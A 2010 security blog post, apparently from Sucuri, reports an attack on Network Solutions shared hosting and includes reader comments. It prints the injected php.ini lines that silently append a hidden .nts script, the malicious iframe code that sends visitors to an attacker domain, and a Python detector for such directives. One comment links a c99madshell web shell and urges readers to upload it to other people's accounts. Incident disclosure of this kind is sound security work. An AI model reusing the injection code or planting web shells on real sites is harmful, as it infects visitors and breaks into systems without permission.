Continuing attacks at Network Solutions?

May 7, 2010, by David Dede


Last week we reported about an attack against Network Solutions that modified the “php.ini” file on hundreds of sites to append a malicious payload to all of their pages.

You can read more about it here:
https://blog.sucuri.net/2010/05/new-infections-today-at-network.html

The problem was caused by an internal bug at Network Solutions that had supposedly been fixed already.

Yet this morning we started to receive reports of a very similar kind of attack against sites on their shared servers. According to the file timestamps, the files were added between 1 and 2am today (May 7th).

First, the cgi-bin/php.ini had these extra lines:

include_path=".";
;;;;;;;;;;;;;;;;;;;
display_errors= off;
;;;;;;;;;;;;;;;;;;;
error_reporting=0;
;;;;;;;;;;;;;;;;;;;
auto_append_file = .nts;
;;;;;;;;;;;;;;;;;;;

See the "auto_append_file"? It means that for every PHP page on the site, the hidden .nts script is executed after the page and its output is appended to the response. The "display_errors" and "error_reporting" lines make sure any error from that script stays invisible to the site owner.
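The following is an added detection example, not code from the original post or from Sucuri: it parses php.ini text and flags any auto_append_file/auto_prepend_file directive (a hidden dotfile like ".nts" is the pattern seen here) together with the error-silencing combination from the listing above. The sample php.ini is constructed from the lines quoted in the post.

```python
from pathlib import Path

# Directives that make PHP run an extra file on every request; the injected
# php.ini in this post used auto_append_file, auto_prepend_file is its twin.
INJECT_DIRECTIVES = ("auto_append_file", "auto_prepend_file")
# The injected block also silenced errors so the site owner sees nothing odd.
HIDING_DIRECTIVES = {"display_errors": "off", "error_reporting": "0"}

def parse_php_ini(text):
    """Return {directive: value} from php.ini text; ';' starts a comment."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip("\"'")
    return settings

def find_injected_directives(text):
    """Return (directive, value, is_dotfile) for each auto_*_file directive set,
    plus one 'error_hiding' finding when both silencing directives are present."""
    settings = parse_php_ini(text)
    findings = []
    for name in INJECT_DIRECTIVES:
        value = settings.get(name)
        if value:  # a hidden dotfile such as ".nts" is the pattern seen here
            findings.append((name, value, Path(value).name.startswith(".")))
    if all(settings.get(k, "").lower() == v for k, v in HIDING_DIRECTIVES.items()):
        findings.append(("error_hiding", "display_errors=off, error_reporting=0", False))
    return findings

# Constructed sample reproducing the lines quoted in the post, not a file from a victim site.
SAMPLE_INI = """\
include_path=".";
;;;;;;;;;;;;;;;;;;;
display_errors= off;
error_reporting=0;
auto_append_file = .nts;
"""

if __name__ == "__main__":
    for name, value, dotfile in find_injected_directives(SAMPLE_INI):
        print(f"{name}: {value}{' (hidden dotfile)' if dotfile else ''}")
```

On a shared host, run it over every php.ini and .user.ini under the document root, since PHP reads per-directory .user.ini files too.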

We were able to download the .nts file and it is very similar to this one: http://sucuri.net/malware/entry/MW:GREPADD:2, except that now it sends visitors to the domain http://virtual-ad.org by using this iframe:

document.write('<iframe frameborder="0" onload=\'if (!this.src){ this.src="http://virtual-ad.org/in.cgi?2"; this.height=0; this.width=0; }\'></iframe>');

Interestingly, this new domain is also hosted at 188.124.16.133 and registered by:

Registrant Name:Neverglovskiy Vadim
Registrant Organization:Neverglovskiy Vadim
Registrant Email:alex1978a@bigmir.net

If you are at Network Solutions, check your site now to make sure it is clean. If you have more information, share it with us.

*Also, note that your site will not get blacklisted because of this malware. It avoids the Google crawler, but it will still infect your users.

**Video removed. We don’t want to be giving views/attention to criminals/script kiddies that just want to show off.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.


About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Anonymous

    May 7, 2010

    We at http://www.thevirtualtouch.com are hosted by Network Solutions and did get blacklisted at 2pm today 5/7/10 because of the virtual-ad.org malware. We do not see the script on the infected pages and we do not know if this was a "timed" malware or it is hidden. When we contacted Network Solutions, instead of admitting that there was the malware problem, we were told to contact Google to straighten out the problem! NetSol just lost my business!

  2. Anonymous

    May 7, 2010

    After seeing that YouTube video you posted I'm tempted to contact some of the customers via their still functional website because if they haven't tried to access their FTP or file manager they're none the wiser. Yet the video shows their files and file structures!

    Today I was using FTP getting a website ready for launch and it stopped working, mid-transfer. Too bad my client already bought their hosting package at NS. A Google search reveals scary careless stuff on NS's part. My client will definitely not be renewing!!

  3. GodRä

    May 7, 2010

    This can likely be real and probably isn't terribly hard to do. Notice the permission listed on the top, "drwxr-wr-x"; since it's world-readable, the person can browse around in the file tree. If there are some directories or files with o+w permission, the hacker can drop their own code into the file/dir.

    Many shared hosts are vulnerable to this type of attack, esp. ones that allow users to chmod a dir, since non-savvy users don't realize the implications of applying an o+w permission to a web-accessible file/dir.

    Btw, they are using a PHP shell called "c99madshell":

    http://madnet.name/files/download/9_c99madshell.php

    If someone has a NS acct (I don't) and wants to try and verify it, upload the PHP shell and see if you can do the same as the video. =P

    Just my 2 cents.

  4. Anonymous

    June 3, 2010

    Your scan of http://www.lcdtvassociation.org found MW:JS:205 on 03 Jun 10, so the problem persists.
